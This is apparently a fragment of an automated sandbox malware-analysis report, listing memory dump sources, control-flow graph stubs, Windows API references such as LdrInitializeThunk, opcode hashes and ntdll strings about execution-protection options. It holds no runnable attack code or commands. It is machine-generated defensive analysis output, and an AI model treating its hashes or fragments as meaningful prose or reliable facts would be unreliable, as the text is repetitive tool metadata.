                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: aac984f24416b190ac83aa4e0a5840e9cb3b07d84652d333ece93656bf701aa6
                                                                                                                                                                                                                          • Instruction ID: ba3f32b13bf1ef7cb8c3c45d2721d164baf6ab094ee1c31ff126d7ef946a9532
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aac984f24416b190ac83aa4e0a5840e9cb3b07d84652d333ece93656bf701aa6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4290022130104403D540B15855186864019D7E1301F51D416E0404954CDB2588566236

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 158 34a2c30-34a2c3c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: bad0aecd6d30ad540c27656dad1de299f7809e9362bc453138effef9e42a9f75
                                                                                                                                                                                                                          • Instruction ID: 1ea59e205581ec68cf6d265b81ba5579e9f91232f77fd8eceef18fd8ce5def9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad0aecd6d30ad540c27656dad1de299f7809e9362bc453138effef9e42a9f75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3490022921304403D580B158550868A001987D1202F91D81AA0005958CCB2588696335

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 160 34a2cf0-34a2cfc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 0d6e9d26c2011134bdacd152a1f6db8cdb563776075627051e3790b5ac1b4226
                                                                                                                                                                                                                          • Instruction ID: 3d9ad4bc001d76377343c6051ccf2947528d2855559049f30de5ab7aecb29b53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6e9d26c2011134bdacd152a1f6db8cdb563776075627051e3790b5ac1b4226
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE900221242085539945F1584504587401A97E0241791C417A1404D50CC7369856E635
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 135 92852d-92854a RtlDosPathNameToNtPathName_U 136 9284e3 135->136 137 92854c 135->137 138 92854d-92855f 136->138 139 9284e5-9284ea 136->139 137->138 140 928561-928567 138->140 141 9284eb-9284fa 138->141 139->141 142 928523-928528 140->142 143 928511-928522 141->143 144 9284fc-928506 141->144 142->135 143->142
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL ref: 0092852D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30459507083.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_900000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$NameName_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3514427675-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 145 34a2b2a-34a2b2f 146 34a2b3f-34a2b46 LdrInitializeThunk 145->146 147 34a2b31-34a2b38 145->147
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462599408.0000000003310000.00000040.00000800.00020000.00000000.sdmp, Offset: 03310000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3310000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ExecuteOptions, xrefs: 034D44AB
                                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034D4460
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034D454D
                                                                                                                                                                                                                          • Execute=1, xrefs: 034D451E
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 034D4592
                                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034D4507
                                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034D4530
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                                          • API String ID: 0-1194432280